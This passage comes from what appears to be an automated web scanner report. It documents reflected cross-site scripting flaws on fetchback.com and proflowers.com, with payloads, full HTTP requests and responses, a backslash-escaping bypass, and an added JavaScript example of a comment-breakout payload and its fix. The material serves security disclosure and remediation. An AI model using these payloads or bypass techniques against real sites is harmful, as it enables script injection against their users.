   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags; in the response shown below the reflection point is inside an HTML comment (<!-- campaign : '...' *not* found -->). The payload 2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6 was submitted in the name parameter. This input was echoed as 2ccab<x style=x:expression(alert(1))>059125350e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary markup, and through it JavaScript, into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to legacy versions of Internet Explorer and is not supported by other browsers; because the angle brackets are reflected unencoded, other tag-based payloads should be tried for those. Note also that the reflection sits inside an HTML comment, so the payload exactly as submitted is comment text and is not parsed as markup: a working attack must first terminate the comment with -->, and nothing in the response indicates that > is encoded, since the > in the payload is reflected as-is.

Request

GET /serve/fb/pdc?cat=&name=landing2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304695062_13981:0_13479:0_15758:159333_12704:159333_4895:587518_10164:951794_10638:951794_10640:951794_10641:951794_1437:951794_1660:1515390; uid=1_1304695062_1303179323923:6792170478871670; kwd=1_1304695062_12936:0_11317:951794_11717:951794_11718:951794_11719:951794; sit=1_1304695062_3455:0:0_2988:222280:188109_3801:334723:334303_1714:619256:587518_3306:846882:159333_719:952621:951794_2451:1003490:998390_3236:1161453:1161335_782:1515739:1515390; cre=1_1304695062_29802:59536:1:334091_29805:59534:1:334752; bpd=1_1304695062_1ZCU5:3YJ3; apd=1_1304695062; scg=1_1304695062; ppd=1_1304695062; afl=1_1304695062

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304902976_13981:207914_13479:207914_15758:367247_12704:367247_4895:795432_10164:1159708_10638:1159708_10640:1159708_10641:1159708_1437:1159708_1660:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: uid=1_1304902976_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: kwd=1_1304902976_12936:207914_11317:1159708_11717:1159708_11718:1159708_11719:1159708; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: sit=1_1304902976_3455:207914:207914_2988:430194:396023_3801:542637:542217_1714:827170:795432_3306:1054796:367247_719:1160535:1159708_2451:1211404:1206304_3236:1369367:1369249_782:1723653:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: cre=1_1304902976_29802:59536:1:542005_29805:59534:1:542666; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: bpd=1_1304902976_1ZCU5:4QOV; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: apd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: scg=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: ppd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: afl=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:02:56 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing2ccab<x style=x:expression(alert(1))>059125350e6' *not* found -->
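Worked example added here for finding 4.180; it is not code from Burp Suite or from pixel.fetchback.com. The response template is reconstructed from the captured response above, the second payload (which first closes the comment) is constructed for illustration, and the function names and the small comment-aware scan are assumptions. It shows that the payload as reported stays inert inside the comment, that a comment-terminating payload reaches the parser, and that entity-encoding the value before reflection defeats both.

```javascript
// Added example for finding 4.180; it is not code from Burp Suite or from
// pixel.fetchback.com. The response template is reconstructed from the captured
// response; the tokenizer and all function names are assumptions.

// Payload from the report (URL-decoded) and a constructed variant that first
// terminates the comment the value is reflected into.
const REPORTED_PAYLOAD = 'landing2ccab<x style=x:expression(alert(1))>059125350e6';
const BREAKOUT_PAYLOAD = 'landing--><x style=x:expression(alert(1))><!--';

// The reflection point seen in the response: the raw name value is written
// into an HTML comment with no encoding at all.
function renderVulnerable(name) {
  return `<!-- campaign : '${name}' *not* found -->`;
}

// Entity-encode the five characters that carry meaning in HTML text and
// attribute contexts. Encoding > also stops a reflected value from forming
// the --> (or --!>) sequence that ends a comment.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtmlText(value) {
  return value.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderFixed(name) {
  return `<!-- campaign : '${encodeHtmlText(name)}' *not* found -->`;
}

// Minimal scan that mirrors how the HTML parser treats comments: everything
// from <!-- up to the next --> is comment text, so a tag inside it is inert
// (the --!> terminator is ignored here). Returns the start-tag names the
// parser would actually see.
function tagsOutsideComments(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html.startsWith('<!--', i)) {
      const end = html.indexOf('-->', i + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    const m = /^<([A-Za-z][^\s/>]*)/.exec(html.slice(i));
    if (m) {
      tags.push(m[1].toLowerCase());
      i += m[0].length;
      continue;
    }
    i += 1;
  }
  return tags;
}

// Three outcomes: the payload exactly as reported stays inside the comment,
// the breakout payload exposes an <x> tag, and encoding defeats the breakout.
function demo() {
  return {
    reportedAsIs: tagsOutsideComments(renderVulnerable(REPORTED_PAYLOAD)),
    breakout: tagsOutsideComments(renderVulnerable(BREAKOUT_PAYLOAD)),
    fixed: tagsOutsideComments(renderFixed(BREAKOUT_PAYLOAD)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderVulnerable(BREAKOUT_PAYLOAD));
  console.log(renderFixed(BREAKOUT_PAYLOAD));
  console.log(demo());
}
```

Browsers do not decode entities inside a comment, so the encoded text is what a reader of the page source sees; for a debug comment like this one the better fix is simply not to echo the parameter. The encoder is the same one to apply anywhere the value lands in HTML text, which is the context Burp reported.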

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141b9\"%3balert(1)//08331235fa2 was submitted in the Ref parameter. This input was echoed as 141b9\\";alert(1)//08331235fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef141b9\"%3balert(1)//08331235fa2 HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:39 GMT
Content-Length: 150181


<noscript>
<div class="splashBox">
   <p>We’re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050137","30050137","30050137","428685","27","HomeNoRef141b9\\";alert(1)//08331235fa2","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e13\"%3balert(1)//07e77d7addd was submitted in the tile parameter. This input was echoed as c3e13\\";alert(1)//07e77d7addd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carouselc3e13\"%3balert(1)//07e77d7addd&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:07 GMT
Content-Length: 148302


<noscript>
<div class="splashBox">
   <p>We’re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
tpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_carouselc3e13\\";alert(1)//07e77d7addd" != "")
           {
               s.eVar20="PFC_hmpg_carouselc3e13\\";alert(1)//07e77d7addd_";
           }
           s.eVar37=cleanString("PFC:Product:30050137_Deluxe Mother’s Day Bouquet");
           s.eVar51="HPC";
           s.events =
...[SNIP]...

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2010f\"%3balert(1)//114dc093c72 was submitted in the trackingpgroup parameter. This input was echoed as 2010f\\";alert(1)//114dc093c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation mark (or in the same pass), otherwise the quote-escaping step re-introduces exactly the bypass shown here. The characters < and > should additionally be escaped (for example as \x3c and \x3e) so that a reflected value can never close the enclosing script block.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC2010f\"%3balert(1)//114dc093c72&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:11:28 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:11:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:11:28 GMT
Content-Length: 143627


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
");
           s.prop1 = cleanString("PFC:Product:30050137-DeluxeMother...sDayBouquet");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           else if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCart" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           
...[SNIP]...

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f678a\"%3balert(1)//17f597f93ba was submitted in the Ref parameter. This input was echoed as f678a\\";alert(1)//17f597f93ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoReff678a\"%3balert(1)//17f597f93ba HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:36:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:36:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:25 GMT
Content-Length: 143975


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30008396","30008396","30008396","293461","27","HomeNoReff678a\\";alert(1)//17f597f93ba","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the tile request parameter is copied into a JavaScript rest-of-line comment. The payload 702ee%0aalert(1)//1c7004ec03a was submitted in the tile parameter. This input was echoed as 702ee
alert(1)//1c7004ec03a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373702ee%0aalert(1)//1c7004ec03a&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
